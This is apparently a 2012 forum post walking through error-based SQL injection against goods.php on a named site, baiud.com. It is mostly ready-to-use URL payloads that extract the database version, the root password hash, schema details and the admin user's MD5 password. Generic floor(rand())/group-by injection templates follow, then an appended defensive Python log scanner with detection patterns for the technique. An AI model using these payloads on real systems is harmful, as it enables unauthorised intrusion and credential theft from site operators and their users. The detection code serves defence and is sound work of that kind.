Blind injection in detail

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-5 14:59:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Determine the version number

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Determine the operating system

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Current user()

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Current database()

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

root hash

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Table names of the current database

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

The user_name column of the current database

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

The password column of the current database

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Obtain the admin password (md5)

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Error-based injection

SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)

SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)

and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
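As an added defender-side example (not part of the original post): a small Python scanner that URL-decodes the query parameters in web-server access-log lines and flags requests carrying the building blocks of the floor(rand())/group-by error-based technique shown above. The log lines are constructed; the second one reuses the first payload from the post so the match can be seen end to end.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (not from the original post). The
# second line carries the post's @@version payload; the third is a benign
# request that happens to contain the word "floor".
SAMPLE_LOG = """\
10.0.0.5 - - [05/Sep/2012:14:59:30 +0800] "GET /goods.php?id=352&wsid=1 HTTP/1.1" 200 5120
10.0.0.9 - - [05/Sep/2012:15:01:02 +0800] "GET /goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23 HTTP/1.1" 500 0
10.0.0.7 - - [05/Sep/2012:15:02:11 +0800] "GET /search.php?q=floor+plans HTTP/1.1" 200 900
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')

# Each rule matches one building block of the technique; requiring at least
# two of them per request keeps harmless hits such as "floor plans" out.
SIGNATURES = {
    "rand_floor": re.compile(r"floor\s*\(\s*rand\s*\(\s*\d*\s*\)\s*\*\s*2\s*\)", re.I),
    "group_by": re.compile(r"group\s+by\s+\w+", re.I),
    "count_concat": re.compile(r"count\s*\(\s*\*\s*\)\s*,\s*concat\s*\(", re.I),
    "info_schema": re.compile(r"information_schema\.|mysql\.user", re.I),
}

def decode_params(path):
    """Return every percent-decoded query-string value of a request path."""
    query = urlsplit(path).query
    return [value for _, value in parse_qsl(query, keep_blank_values=True)]

def score_value(value):
    """Names of the signatures that fire on one decoded parameter value."""
    return [name for name, rx in SIGNATURES.items() if rx.search(value)]

def scan_log(text, min_hits=2):
    """Return (client_ip, sorted signature names) for each suspicious request."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        hits = set()
        for value in decode_params(m.group("path")):
            hits.update(score_value(value))
        if len(hits) >= min_hits:
            findings.append((line.split()[0], sorted(hits)))
    return findings

if __name__ == "__main__":
    for ip, names in scan_log(SAMPLE_LOG):
        print(ip, ", ".join(names))
```

The decode step matters: the payloads above are entirely percent-encoded, so a rule applied to the raw request line would never see "group by". Pairing a hit with a 500 status, as on the second sample line, is the practical sign that the application is returning database errors to the client, which is what this technique depends on.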